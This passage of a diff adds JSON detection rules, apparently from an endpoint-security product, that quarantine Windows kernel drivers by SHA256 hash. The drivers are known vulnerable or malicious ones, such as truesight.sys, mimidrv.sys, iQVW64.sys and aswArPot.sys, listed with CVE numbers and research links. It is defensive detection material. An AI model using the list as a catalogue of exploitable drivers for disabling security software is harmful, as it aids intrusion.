+ "hl_testing_start_time": "2026-03-23T11:45:31.480636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32be3865897c1423e766f12f0844379dbf66b3453573baa7208cffa5f2863380",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "569ccba0-7180-5c9f-aab3-dff41529e892",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473005Z",
+ "creation_date": "2026-03-23T11:45:31.473008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473016Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec5a5a764b10d24330442ad8c430689cf9fe3d3d5736a865024b0fe69200fedf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "569d7171-641e-5dad-8fdb-0c2e5086d9de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464762Z",
+ "creation_date": "2026-03-23T11:45:30.464766Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464774Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c89c907b7525b39409af1ad11cc7d2400263601edafc41c935715ef5bd145de",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56ac63a3-f3c1-542d-8ed2-361423412c15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817097Z",
+ "creation_date": "2026-03-23T11:45:31.817099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817105Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "273fb23894e8fc17634c298d924c95bc49f7dddb11a7b9aa6204bb377371445e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56bb8a44-0b37-5722-8d54-42f8091f25fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454358Z",
+ "creation_date": "2026-03-23T11:45:30.454362Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454371Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4",
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56c72148-3d6a-5bc0-b96b-42db4ccd9943",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819550Z",
+ "creation_date": "2026-03-23T11:45:30.819552Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819557Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "64a8e00570c68574b091ebdd5734b87f544fa59b75a4377966c661d0475d69a5",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56c87519-c83c-54bf-86b5-35d2f50f8a13",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972301Z",
+ "creation_date": "2026-03-23T11:45:29.972303Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972308Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94b42f99cb2ac4db601a3759afe374168bad1714bd48662d74fed69099517a65",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56cd4429-61e3-527d-af02-afd9fd8fc001",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156466Z",
+ "creation_date": "2026-03-23T11:45:31.156468Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15a4c8495fc6e8d94c7b7a2f8a05ed92a563b51f915929ef2e46261ac5793a07",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56d89bbc-8281-50e1-b537-f63b2906bda9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823179Z",
+ "creation_date": "2026-03-23T11:45:31.823182Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823190Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "10604ddc07eb097b4ec8cfaff0b94f35722baab0e8e4ac66fecf2aa2b45a5c1a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56ec96f0-ffc5-5419-97a3-134ed8446ac1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492785Z",
+ "creation_date": "2026-03-23T11:45:31.492787Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492793Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1fd5786000e1c8e0c60129b3acfe9ae0128f8c4fadb5308ed8e05207c7dffecc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56ee56dd-cd2f-5962-ada6-e3af6b0ad354",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482663Z",
+ "creation_date": "2026-03-23T11:45:31.482667Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482677Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9347d7132656d9e9996aef18700e0cc8abb3e88b082b78ed1ece49c5614cb745",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56fedf0c-150a-5ed8-9ca6-d1fac98d887f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159768Z",
+ "creation_date": "2026-03-23T11:45:31.159770Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159778Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ccab572ef2e48b88b5771be6f1c8edbbbf726ab25fcf104ac7cc309ab5d0cb1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57064d2b-418b-50c2-b59c-2194f0a14f27",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147824Z",
+ "creation_date": "2026-03-23T11:45:31.147826Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147831Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a10f757dff2b419be2a656edb466d23dd04f1e3bcba39f8d5b371b9a7075eff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5719b49c-488e-5201-91ae-dddb68c22ae9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808939Z",
+ "creation_date": "2026-03-23T11:45:31.808942Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808954Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "add7cf1ac2d779e1c976e9f71ab09fbf907c1ba6e77e8c8d55c5dab4d73a2d4a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "571a10f6-eeed-5b34-93ad-7a5f4d74315f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472314Z",
+ "creation_date": "2026-03-23T11:45:30.472318Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472327Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a0702681bc51419fbd336817787a966c7f92cabe09f8e959251069578dfa881",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "572affc0-f4b9-514d-9c5a-7a9600d5bc75",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154282Z",
+ "creation_date": "2026-03-23T11:45:31.154284Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154289Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f7267ed91737dfcf283c524f8f77119afc4ca9dd679f35fafe1187be8f815f6e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "572d304f-d972-5498-9537-6462a3a34e91",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969274Z",
+ "creation_date": "2026-03-23T11:45:29.969276Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969282Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad8ffccfde782bc287241152cf24245a8bf21c2530d81c57e17631b3c4adb833",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57325f85-54a4-5fa6-b985-392f892907c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971968Z",
+ "creation_date": "2026-03-23T11:45:29.971970Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971975Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19bf0d0f55d2ad33ef2d105520bde8fb4286f00e9d7a721e3c9587b9408a0775",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5733b3d0-b9e9-5d21-a902-a154077b3dd6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160552Z",
+ "creation_date": "2026-03-23T11:45:31.160554Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160560Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89e3b48604ac98da4da740008b29295ad622b15a2f7eeec1fd5317d926ebe5c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57395476-b9bf-5ab1-843f-744ed5960536",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608831Z",
+ "creation_date": "2026-03-23T11:45:29.608833Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608838Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e5abe4530eff3838d44516f95c15d8b3ec6cec44ca7b67998e50641c939d12a",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5740ede6-c4bf-5a59-bafc-b83fa883e0d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608265Z",
+ "creation_date": "2026-03-23T11:45:29.608267Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608272Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85d21ad0e0b43d122f3c9ec06036b08398635860c93d764f72fb550fb44cf786",
+ "comment": "Vulnerable Kernel Driver (aka STProcessMonitor.sys) [https://github.com/ANYLNK/STProcessMonitorBYOVD/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57459303-ac3a-5571-8b1f-f184176e461d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490540Z",
+ "creation_date": "2026-03-23T11:45:31.490542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490548Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea32fb5b27bc5cf85af687d61837cee2ac67d2412c58ac32a7375afc8a7b3d39",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "574a0095-9367-5774-b5ba-bc362c9beac9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142379Z",
+ "creation_date": "2026-03-23T11:45:31.142381Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142387Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "27ec009fd86898d1319bfe14483d131155e4b929fc8362cda1ab024960725474",
